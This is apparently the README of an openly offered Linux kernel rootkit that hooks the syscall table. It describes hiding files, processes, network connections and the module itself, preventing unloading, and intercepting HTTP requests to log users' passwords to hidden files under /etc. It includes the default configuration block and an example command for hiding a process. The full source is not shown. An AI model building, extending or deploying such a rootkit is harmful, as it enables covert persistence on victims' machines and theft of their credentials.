


Yet another LKM rootkit for Linux. It hooks syscall table.


  1. Hide files that ends on configured suffix (FILE_SUFFIX - ".rootkit" by default).
  2. Hide processes that cmdline contains defined text (COMMAND_CONTAINS - ".//./" by default).


wget http://old-releases.ubuntu.com/releases/zesty/ubuntu-17.04-desktop-amd64.iso .//./
  1. Intercept HTTP requests.
    All intercepted GET and POST HTTP requests are logged to /etc/http_requests[FILE_SUFFIX].
    When password is found in HTTP request it's additionally logged to /etc/passwords[FILE_SUFFIX].
  2. Rootkit module is invisible in lsmod output, file /proc/modules, and directory /sys/module/.
  3. It isn't possible to unload rootkit by rmmod command (if option UNABLE_TO_UNLOAD is set).
  4. Netstat and similar tools won't see TCP connections of hidden processes.


The configuration is placed at the beginning of file rootkit.c.
Below is a default configuration:

//beginning of the rootkit's configuration
#define FILE_SUFFIX ".rootkit"    	//hiding files with names ending on defined suffix
#define COMMAND_CONTAINS ".//./"    //hiding processes which cmdline contains defined text
#define ROOTKIT_NAME "rootkit"    	//you need to type here name of this module to make this module hidden
#define SYSCALL_MODIFY_METHOD PAGE_RW   //method of making syscall table writeable, CR0 or PAGE_RW
#define DEBUG 0                     //this is for me :)
//end of configuration

Tested on:

Linux x 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux